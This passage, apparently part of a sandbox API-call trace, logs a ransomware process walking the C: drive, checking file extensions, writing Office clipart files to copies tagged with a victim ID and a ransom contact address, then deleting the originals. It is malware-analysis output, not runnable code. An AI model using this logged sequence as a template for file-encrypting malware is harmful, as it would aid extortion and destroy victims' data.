Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.688] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf")) returned 1 [0200.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 68 [0200.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 68 [0200.688] lstrlenW (lpString=".doc") returned 4 [0200.688] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString=".docx") returned 5 [0200.689] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0200.689] lstrlenW (lpString=".pdf") returned 4 [0200.689] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString=".xls") returned 4 [0200.689] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.689] lstrlenW (lpString=".xlsx") returned 5 [0200.689] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0200.689] lstrlenW (lpString=".ppt") returned 4 [0200.689] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 68 [0200.689] lstrlenW (lpString=".zip") returned 4 [0200.689] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.689] lstrlenW (lpString=".rar") returned 4 [0200.689] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString=".bz2") returned 4 [0200.689] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString=".7z") returned 3 [0200.689] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 68 [0200.689] lstrlenW (lpString=".dbf") returned 4 [0200.689] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 68 [0200.689] lstrlenW (lpString=".1cd") returned 4 [0200.689] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF") returned 68 [0200.689] lstrlenW (lpString=".jpg") returned 4 [0200.689] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.690] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.690] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0200.691] GetLastError () returned 0x0 [0200.691] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xa783, lpOverlapped=0x0) returned 1 [0201.625] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xa790, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xa790, lpOverlapped=0x0) returned 1 [0201.627] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.627] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.627] SetEndOfFile (hFile=0x39c) returned 1 [0201.627] CloseHandle (hObject=0x39c) returned 1 [0201.627] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.627] SetEndOfFile (hFile=0x38c) returned 1 [0201.631] CloseHandle (hObject=0x38c) returned 1 [0201.632] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.632] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216112.jpg")) returned 1 [0201.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 68 [0201.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 68 [0201.633] lstrlenW (lpString=".doc") returned 4 [0201.633] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0201.633] lstrlenW (lpString=".docx") returned 5 [0201.633] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0201.633] lstrlenW (lpString=".pdf") returned 4 [0201.633] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0201.633] lstrlenW (lpString=".xls") returned 4 [0201.633] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0201.633] lstrlenW (lpString=".xlsx") returned 5 [0201.633] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0201.633] lstrlenW (lpString=".ppt") returned 4 [0201.633] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0201.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 68 [0201.633] lstrlenW (lpString=".zip") returned 4 [0201.633] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0201.633] lstrlenW (lpString=".rar") returned 4 [0201.633] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0201.633] lstrlenW (lpString=".bz2") returned 4 [0201.633] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0201.633] lstrlenW (lpString=".7z") returned 3 [0201.633] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0201.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 68 [0201.634] lstrlenW (lpString=".dbf") returned 4 [0201.634] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0201.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 68 [0201.634] lstrlenW (lpString=".1cd") returned 4 [0201.634] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0201.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216112.JPG") returned 68 [0201.634] lstrlenW (lpString=".jpg") returned 4 [0201.634] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0201.634] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.634] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0201.635] GetLastError () returned 0x0 [0201.635] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1f46, lpOverlapped=0x0) returned 1 [0201.723] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1f50, lpOverlapped=0x0) returned 1 [0201.724] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.724] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.724] SetEndOfFile (hFile=0x39c) returned 1 [0201.725] CloseHandle (hObject=0x39c) returned 1 [0201.725] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.725] SetEndOfFile (hFile=0x38c) returned 1 [0201.726] CloseHandle (hObject=0x38c) returned 1 [0201.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.726] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216600.wmf")) returned 1 [0201.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 68 [0201.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 68 [0201.727] lstrlenW (lpString=".doc") returned 4 [0201.727] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.727] lstrlenW (lpString=".docx") returned 5 [0201.727] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0201.727] lstrlenW (lpString=".pdf") returned 4 [0201.727] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.727] lstrlenW (lpString=".xls") returned 4 [0201.727] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.727] lstrlenW (lpString=".xlsx") returned 5 [0201.727] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0201.727] lstrlenW (lpString=".ppt") returned 4 [0201.727] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 68 [0201.727] lstrlenW (lpString=".zip") returned 4 [0201.727] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.727] lstrlenW (lpString=".rar") returned 4 [0201.727] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.727] lstrlenW (lpString=".bz2") returned 4 [0201.728] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.728] lstrlenW (lpString=".7z") returned 3 [0201.728] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 68 [0201.728] lstrlenW (lpString=".dbf") returned 4 [0201.728] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 68 [0201.728] lstrlenW (lpString=".1cd") returned 4 [0201.728] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216600.WMF") returned 68 [0201.728] lstrlenW (lpString=".jpg") returned 4 [0201.728] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.728] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.728] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0201.730] GetLastError () returned 0x0 [0201.730] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1484, lpOverlapped=0x0) returned 1 [0201.776] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1490, lpOverlapped=0x0) returned 1 [0201.777] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.777] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.777] SetEndOfFile (hFile=0x39c) returned 1 [0201.777] CloseHandle (hObject=0x39c) returned 1 [0201.777] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.777] SetEndOfFile (hFile=0x38c) returned 1 [0201.779] CloseHandle (hObject=0x38c) returned 1 [0201.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217262.wmf")) returned 1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 68 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 68 [0201.780] lstrlenW (lpString=".doc") returned 4 [0201.780] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.780] lstrlenW (lpString=".docx") returned 5 [0201.780] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0201.780] lstrlenW (lpString=".pdf") returned 4 [0201.780] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.780] lstrlenW (lpString=".xls") returned 4 [0201.780] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.780] lstrlenW (lpString=".xlsx") returned 5 [0201.780] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0201.780] lstrlenW (lpString=".ppt") returned 4 [0201.780] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 68 [0201.780] lstrlenW (lpString=".zip") returned 4 [0201.780] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.780] lstrlenW (lpString=".rar") returned 4 [0201.781] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.781] lstrlenW (lpString=".bz2") returned 4 [0201.781] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.781] lstrlenW (lpString=".7z") returned 3 [0201.781] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 68 [0201.781] lstrlenW (lpString=".dbf") returned 4 [0201.781] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 68 [0201.781] lstrlenW (lpString=".1cd") returned 4 [0201.781] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.781] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217262.WMF") returned 68 [0201.781] lstrlenW (lpString=".jpg") returned 4 [0201.781] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.781] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.781] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0201.782] GetLastError () returned 0x0 [0201.782] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x8ad6, lpOverlapped=0x0) returned 1 [0201.862] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x8ae0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x8ae0, lpOverlapped=0x0) returned 1 [0201.864] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.864] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.865] SetEndOfFile (hFile=0x39c) returned 1 [0201.865] CloseHandle (hObject=0x39c) returned 1 [0201.865] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.865] SetEndOfFile (hFile=0x38c) returned 1 [0201.866] CloseHandle (hObject=0x38c) returned 1 [0201.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0227419.jpg")) returned 1 [0201.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 68 [0201.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 68 [0201.867] lstrlenW (lpString=".doc") returned 4 [0201.867] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0201.867] lstrlenW (lpString=".docx") returned 5 [0201.867] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1 [0201.867] lstrlenW (lpString=".pdf") returned 4 [0201.867] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0201.867] lstrlenW (lpString=".xls") returned 4 [0201.867] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0201.867] lstrlenW (lpString=".xlsx") returned 5 [0201.867] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1 [0201.867] lstrlenW (lpString=".ppt") returned 4 [0201.867] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0201.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 68 [0201.868] lstrlenW (lpString=".zip") returned 4 [0201.868] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0201.868] lstrlenW (lpString=".rar") returned 4 [0201.868] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0201.868] lstrlenW (lpString=".bz2") returned 4 [0201.868] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0201.868] lstrlenW (lpString=".7z") returned 3 [0201.868] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0201.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 68 [0201.868] lstrlenW (lpString=".dbf") returned 4 [0201.868] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0201.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 68 [0201.868] lstrlenW (lpString=".1cd") returned 4 [0201.868] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0201.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0227419.JPG") returned 68 [0201.868] lstrlenW (lpString=".jpg") returned 4 [0201.868] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0201.870] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.870] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232393.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232393.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0201.871] GetLastError () returned 0x0 [0201.871] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x6bc2, lpOverlapped=0x0) returned 1 [0201.921] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x6bd0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x6bd0, lpOverlapped=0x0) returned 1 [0201.922] ReadFile (in: hFile=0x38c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.922] WriteFile (in: hFile=0x39c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.922] SetEndOfFile (hFile=0x39c) Thread: id = 93 os_tid = 0x908 [0178.042] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x3c40940 [0178.042] lstrlenW (lpString="C:") returned 2 [0178.042] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x339fcf8 | out: lpFindFileData=0x339fcf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x69a6f0 [0178.043] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0178.043] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\$GetCurrent") returned 1 [0178.043] lstrlenW (lpString="$GetCurrent") returned 11 [0178.043] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="$GetCurrent") returned 1 [0178.043] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x3c50948 [0178.043] lstrlenW (lpString="C:\\$GetCurrent") returned 14 [0178.043] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*", lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x69a730 [0178.044] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0178.044] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x339fa7c | out: lpFindFileData=0x339fa7c*(dwFileAttributes=0x10, 